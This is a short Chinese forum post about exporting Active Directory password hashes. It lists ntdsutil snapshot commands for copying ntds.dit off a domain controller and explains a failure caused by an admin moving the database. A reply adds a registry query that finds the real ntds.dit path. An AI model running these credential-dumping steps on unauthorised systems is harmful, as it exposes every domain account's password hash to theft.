域内导hash时遇到的一点问题
发布于 2 个月前 阅读权限 无需登录 作者 tlskbz 1928 次浏览 来自 知识碎片

关于导出域内HASH,网上常见的步骤是这样的

ntdsutil snapshot "activate instance ntds" create quit quit
ntdsutil snapshot "mount {GUID}" quit quit
copy "MOUNT_POINT\windows\ntds\ntds.dit" "c:\temp\ntds.dit"
ntdsutil snapshot "unmount {GUID}" "delete {GUID}" quit quit

有次我也是这么操作的,却在第三步出了错,提示ntds文件不存在,查阅资料后在 活动目录数据库维护上找到了答案,原来是因为管理员修改了默认的数据库存储位置 在域控上AD数据库的默认存储路径为 windows\ntds\ntds.dit ,但有时管理员会给改掉 可以用下面的方法查看数据库的存储信息 ad_config 在找到正确的数据库保存路径后在复制出来就好啦

5 回复

reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters \获取ntds路径

@xiaocheng 内网渗透,亚太第一人

@xiaocheng 内网渗透,亚美欧第一人

@xiaocheng 内网渗透,亚太第一人

@xiaocheng 内网渗透,亚非第一人

回到顶部